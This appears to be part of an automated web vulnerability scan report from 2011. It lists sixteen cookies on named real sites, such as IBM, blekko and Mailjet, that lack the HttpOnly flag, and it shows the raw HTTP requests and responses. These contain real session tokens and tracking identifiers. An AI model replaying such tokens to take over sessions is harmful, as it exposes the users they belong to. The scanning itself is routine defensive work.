If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



12.1. http://ads.adxpose.com/ads/ads.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/ads.js?uid=TVYMYp4lQTRs9JsS_40986728 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/80181/197812/index.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
If-None-Match: "20773-gzip"
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ec39c893-8f48-41a8-9b1f-be5afaba100a; JSESSIONID=6AC9FACB62B6A0835C687B3B2B16A9F7

Response

HTTP/1.1 304 Not Modified
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=746347E6AFD90602A159B49A16A15ABB; Path=/
ETag: "20773-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Sat, 17 Sep 2011 00:58:10 GMT
Connection: close


12.2. http://afe.specificclick.net/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://afe.specificclick.net
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?l=1966491151&sz=728x90&wr=j&t=j&u=http%3A//ad.afy11.net/ad%3FasId%3D1000007248707%26sd%3D2x728x90%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D57558110%26rk1%3D25841281%26rk2%3D1316239702.554%26pt%3D0&r=http%3A//bostonherald.com/includes/processAds.bg%3Fposition%3DBottom%26companion%3DTop%2CRight%2CBottom%26page%3Dbh.heraldinteractive.com%252Ftrack%252Finside_track%252Farticle HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=4e7b93d56fbdc433b39cc593f969

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=4ec01f0c7202511a265d88b8398f; Path=/
Content-Type: application/javascript;charset=ISO-8859-1
Date: Sat, 17 Sep 2011 01:06:55 GMT
Content-Length: 1472

document.write('<div style="z-index:10; position:relative; width:728px">'+'<a href="http://clk.specificclick.net/click/v=5;m=2;l=454;c=179530;b=1063955;ts=20110916210656;dct=http://www.bostonreedcolle
...[SNIP]...

12.3. http://alerts.4info.com/alert/ads/dispatcher.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://alerts.4info.com
Path:   /alert/ads/dispatcher.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /alert/ads/dispatcher.jsp?ad_referral_url=http://www.bostonherald.com/mobile/info.bg&ad_format=sports&color_border=efefef&color_bg=efefef&color_link=000099&color_text_title=000000&color_text_normal=000000&ad_creative_id=10000522&ad_minimal=true&default_league=nfl&default_team=&ad_hide_league=false HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2DFD3403C3E28009F3DB2F280F532EB7; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 17148
Date: Sat, 17 Sep 2011 01:50:21 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

12.4. http://alerts.4info.com/alert/ads/fastTrackAlerts.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://alerts.4info.com
Path:   /alert/ads/fastTrackAlerts.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /alert/ads/fastTrackAlerts.js HTTP/1.1
Host: alerts.4info.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BC3AB55F4C3A1A19DCF3184DE1AE32B0; Path=/
Set-Cookie: 4INFO_PTC=BC3AB55F4C3A1A19DCF3184DE1AE32B0; Expires=Thu, 15-Sep-2016 01:07:27 GMT
Accept-Ranges: bytes
ETag: W/"2633-1302809904000"
Last-Modified: Thu, 14 Apr 2011 19:38:24 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 2633
Date: Sat, 17 Sep 2011 01:07:26 GMT


// required parameters
var urlParams = 'ad_referral_url=' + window.location + '&ad_format=' + ad_format;

// optional parameters
if (exists('ad_font_size')) urlParams += '&ad_font_size=' + ad_fo
...[SNIP]...

12.5. http://blekko.com/a/e  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://blekko.com
Path:   /a/e

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /a/e?t=u&i=MjE5ODBhZTAzM2EzNDI5NDViMDdjYWZhN2VjNzg4MDcsMTMxNjIwMjI2MToxNDIzNjZiMDBiMmExMDE2MDRhZTI0NTgxOGI4ODUwZA%3D%3D&_=1316225866624 HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/ws/radius+server
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v=3; t=1316220316418

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 16 Sep 2011 21:16:26 GMT
Content-Type: image/gif
Connection: keep-alive
Keep-Alive: timeout=15
Set-Cookie: sessionid=488315263; path=/; expires=Sat, 17 Sep 2011 01:16:26 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 50
X-Blekko-PT: 54dbc7944f54192478f494e4575d9db8

GIF89a..............!.......,...........D..;..L..;

12.6. http://blekko.com/a/favicon  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://blekko.com
Path:   /a/favicon

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /a/favicon?d=1&h=www.freeradius.org HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/ws/radius+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v=3; t=1316220316418

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 16 Sep 2011 19:44:22 GMT
Content-Type: image/png
Connection: keep-alive
Keep-Alive: timeout=15
Set-Cookie: sessionid=785030015; path=/; expires=Fri, 16 Sep 2011 23:44:22 GMT
Cache-Control: max-age=28800
Expires: Sat, 17 Sep 2011 03:44:22 GMT
Vary: Accept-Encoding
Content-Length: 301
X-Blekko-PT: 83826deae652cda213df8968f7bccb58

.PNG
.
...IHDR...............ex...lPLTE............................................................................................................M.[....|IDAT.....a.@..0..*3....;V.$k....6.d.V.>....
...[SNIP]...

12.7. http://blekko.com/a/track  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://blekko.com
Path:   /a/track

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /a/track?t=ul&l=loc%3Dhttp%3A%2F%2Fblekko.com%2Fws%2Fradius%2Bserver%3Bv_l%3D1%3Bv_ul%3D1%3B&s=1316225866623&i=MjE5ODBhZTAzM2EzNDI5NDViMDdjYWZhN2VjNzg4MDcsMTMxNjIwMjI2MToxNDIzNjZiMDBiMmExMDE2MDRhZTI0NTgxOGI4ODUwZA%3D%3D&y=0 HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/ws/radius+server
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v=3; t=1316220316418

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 16 Sep 2011 21:16:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=15
Set-Cookie: sessionid=400724020; path=/; expires=Sat, 17 Sep 2011 01:16:26 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 0
X-Blekko-PT: a14c1b040a2668178745f1554607d368


12.8. http://blekko.com/autocomplete  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://blekko.com
Path:   /autocomplete

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /autocomplete?query=radiu HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/plain, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v=3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 16 Sep 2011 19:44:19 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=15
Vary: Accept-Encoding
Set-Cookie: sessionid=387677649; path=/; expires=Fri, 16 Sep 2011 23:44:19 GMT
Cache-Control: max-age=43200
Expires: Sat, 17 Sep 2011 07:44:19 GMT
Vary: Accept-Encoding
X-Blekko-PT: feb1fc16564e86bf55a52e654252492e
Content-Length: 279

{"suggestions":["radium hot springs","radium hot springs /hotels","radium hot springs /reviews","radius server","radius server /linux","radius server /it","radius server /windows","radius of gyration"
...[SNIP]...

12.9. http://event.adxpose.com/event.flow  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event.flow?eventcode=000_000_2&location=http%3A%2F%2F3ps.go.com%2FDynamicAd%3Fsrvc%3Dabc%26adTypes%3DRectangles-Remnant%26url%3D%2Fshows%2Fcharlies-angels%2Fbios&uid=TVYMYp4lQTRs9JsS_40986728&xy=0%2C0&wh=300%2C250&vchannel=41471866&cid=3941858&iad=1316239167851-10540979891084134&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/80181/197812/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ec39c893-8f48-41a8-9b1f-be5afaba100a; JSESSIONID=4806DE648106CEB5617C122A21922CA4

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=800B263560026265DF35D5998DF9421B; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 0
Date: Sat, 17 Sep 2011 00:57:59 GMT
Connection: close


12.10. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CB9FFEBBBCE4BAB37F0CF0124340889C; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:07:57 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-an
...[SNIP]...

12.11. http://pixel.adsafeprotected.com/jspix  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jspix?anId=144&pubId=454&campId=179530 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=879FED94B44B817BBB67FDF47F071C96; Path=/
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:48:33 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0",
...[SNIP]...

12.12. http://sales.liveperson.net/visitor/addons/deploy.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy.asp?site=11390142&d_id=uverse-residential HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.att.com/u-verse/availability/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:53:03 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Fri, 09 Sep 2011 16:11:00 GMT
Content-Length: 49604
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDCSSSSQRR=CPCHBHHBHPHMEOGMIAMPCPHL; path=/
Cache-control: public, max-age=3600, s-maxage=3600

lpAddMonitorTag();
typeof lpMTagConfig!="undefined"&&function(a){lpMTagConfig.isMobile=!1;if(/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo
...[SNIP]...

12.13. http://www-304.ibm.com/support/operations/us/en/orderdelivery  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www-304.ibm.com
Path:   /support/operations/us/en/orderdelivery

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /support/operations/us/en/orderdelivery?lnk=mhmy HTTP/1.1
Host: www-304.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/us/en/
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.ibm.com/developerworks/forums/thread.jspa%3FmessageID%3D14644760; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; mbox=check#true#1316221073|session#1316221012167-554408#1316222873|PC#1316221012167-554408.19#1317430615

Response

HTTP/1.1 200 OK
content-type: text/html; charset=UTF-8
date: Fri, 16 Sep 2011 19:57:24 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server/2.0.47.1-PK53584 Apache/2.0.47 (Unix) DAV/2
cache-control: no-cache="set-cookie,set-cookie2"
expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=0000ndqbkupauFWNanvu6jEGCI-:115n6mauu; Path=/
Content-Length: 19977


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang=
...[SNIP]...

12.14. http://www.ibm.com/developerworks/forums/comment.jspa  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ibm.com
Path:   /developerworks/forums/comment.jspa

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /developerworks/forums/comment.jspa?contentID=295813&start=0&range=5&rn=0.09875477327110171&siteID=1 HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://www.ibm.com/developerworks/rational/library/08/0325_segal/index.html
Cookie: JSESSIONID=0000mfhqCKD84k-6BQ8KZJG0e-9:119nuofa6; ibmSurvey=1316220781236; pSite=http%3A//www.redbooks.ibm.com/cgi-bin/searchsite.cgi%3Fquery%3Dxss; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK; JSESSIONID=0000BvNLyPzxNajEfgFdmrEFjxa:12too2opq; mbox=check#true#1316221073|session#1316221012167-554408#1316222873

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:55:56 GMT
Server: IBM_HTTP_Server/6.0.2.43 Apache/2.0.47 (Unix) DAV/2
Via: HTTP/1.1 wwwprdw.southbury-swe.ibm.com (IBM-PROXY-WTE)
Set-Cookie: JSESSIONID=00008VwdHg2qNZjiWJoJxvEP0xU:119nuofa6; Path=/developerworks/forums
Content-Type: text/xml; charset=UTF-8
Content-Language: en-US
Vary: User-Agent, Accept-Encoding
Content-Length: 456

<?xml version="1.0" encoding="UTF-8"?>


<comments>
<totalCount>1</totalCount>
   
   <comment id="14565180">
   <subject><![CDATA[test]]></subject>
   <body><![CDATA[Very thorough. Thanks.]]></body
...[SNIP]...

12.15. http://www.ibm.com/developerworks/utils/ratingJSON.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ibm.com
Path:   /developerworks/utils/ratingJSON.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /developerworks/utils/ratingJSON.jsp?article=91238&rn=0.008329585792949623 HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: application/json, text/javascript, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://www.ibm.com/developerworks/tivoli/library/s-csscript/
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.ibm.com/developerworks/forums/thread.jspa%3FmessageID%3D14644760; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK; JSESSIONID=0000LMUCxwutCTzsCngqWBlERQz:12t762cum; mbox=check#true#1316221073|session#1316221012167-554408#1316222873|PC#1316221012167-554408.19#1317430615

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:57:07 GMT
Server: IBM_HTTP_Server/6.1.0.35 Apache/2.0.47 (Unix) DAV/2
Via: HTTP/1.1 wwwprdw.southbury-swe.ibm.com (IBM-PROXY-WTE)
Set-Cookie: JSESSIONID=0000BHX9VBiw2pkdoj0QKb4kAfq:12too2opq; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 77

{avg_rating: 3.9876543209876543, num_ratings: 162, error_code: 0, voted: 0}

12.16. http://www.mailjet.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mailjet.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.mailjet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: affiliate=US-EN-smtp; __utma=176514170.637056612.1316204845.1316204845.1316216714.2; __utmz=176514170.1316216714.2.2.utmgclid=CKqV0feJoqsCFQdzgwod6j2wjw|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server; mail_session=eBECc5P86kNJkdgPHXMP5I1eoqmuQK8Wth9SeN6SpTanNl%2BIMK3Vk3hh%2BKotjc6kCTPrDJoNurwRw6GM%2BTajfd68Q2JR1srviTEIJQdZlQKcAP%2FgpKerTQyg069KhGc%2BKH8Lqz7CvTFUOuDyUHLQaw3dO5sbOebp%2FdlS43mL0ixewGdzbbUf70Lthq8bT89vu1yA1IJJEHuJkgsvifrOiWlu0lqtQ1mxNLsnfDBqQUeWErQHGUIhtFZ4I6kszTHJVi9nKTtO%2BHEMndjaNyaeH5gOYLil%2FjP3614KUDFePqmcCo8AdA18wCf62qAqYrXYXou1GUUNCQ7Gu6p%2Bgj4NBZTyMiTWqj5vRjYS3u6FfuvOVot%2Frn4DCjf8eGKoOh9Wi%2FdKLTsMqkwMo7mOdNVUqZp96fwCysDLdMJd3jRKoJWcol9ssDrA8rxzNM1IiLEgBkghrkbu3Oe0HKA%2BiG6nvUHaAan6eTFbImXerdkZN6ERU8oyWiTyQh13H7cVFjBnnsG%2Fl%2BZ%2BxWFO5lhxSzjq9Re5pfoI5qbGq23okGTmc1tR0P%2FM09Uax2UAE6RZPDKyHK8Rb0qbhJXKkuqzQE7FfJcUEUIP%2Fvn2mGbPLoBoY5hAOZ1hkdAfeEWnK2F16247

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 21:54:37 GMT
Server: MJWS/1.0
Set-Cookie: mail_session=E7akOnzn%2FBA1l6z%2FaW%2BN1GdC75rQgbL5GSBkgpGxDQxWUXGAjBsnQl2ghC1weFjH97%2FX958Q8xLgMFEPkxx1TUmqwLlxTE52ADvd%2B4K7geFiEoVb1BRSEVx%2FEIdhtPbtqBiAF915vU5lG0o71aUPLVeOkZ0oga%2BQkGE%2BD6xqTJWX9ewXAop2Li%2FUKffRZZEsVmmduR0H0o7STsiY1r5ju8KSYlXV2pSpORxb1nMMduo0w6xfcmI9wXG8Dos%2FVBaFZgmae4BU1Q%2FMFK4il10d7cXGQdLR9bf2gzksL8BoehEaX2hQcFxCXS6i7TSPRwaB7VwqLhcdr6Jq2rtdBxIQEZ4xaZyGmZCMPvCmmZMpjc1uIFX0OPKISRYjNbDyvCGmf0Kp6R5R%2BlYF9U2zc64dZQXsHzDvz3vwHMTx%2BayPNzK5cwY81Mwc%2B0NP%2Bp57ZgC1aNaNdrA7V5hZSPVjWHAuDUY2K4yzLjHDw7hdhpSu3CutQIPGspzdQKm5jJySQnW50UzW5g%2FKWaEYlgQ4fXPZ%2BGll5shnlRV9dN9uOE8Szqht%2BQSqRkJ6W5fdFvxTVihLl6r1DNLD0RSTIFxcshasi6rvTWhrwZR159CrB11QuZFMwLwlUqJwPZAN%2FcRULvZ8; expires=Fri, 23-Sep-2011 21:54:37 GMT; path=/; domain=.mailjet.com
Content-Type: text/html; charset=utf-8
Content-Length: 12292

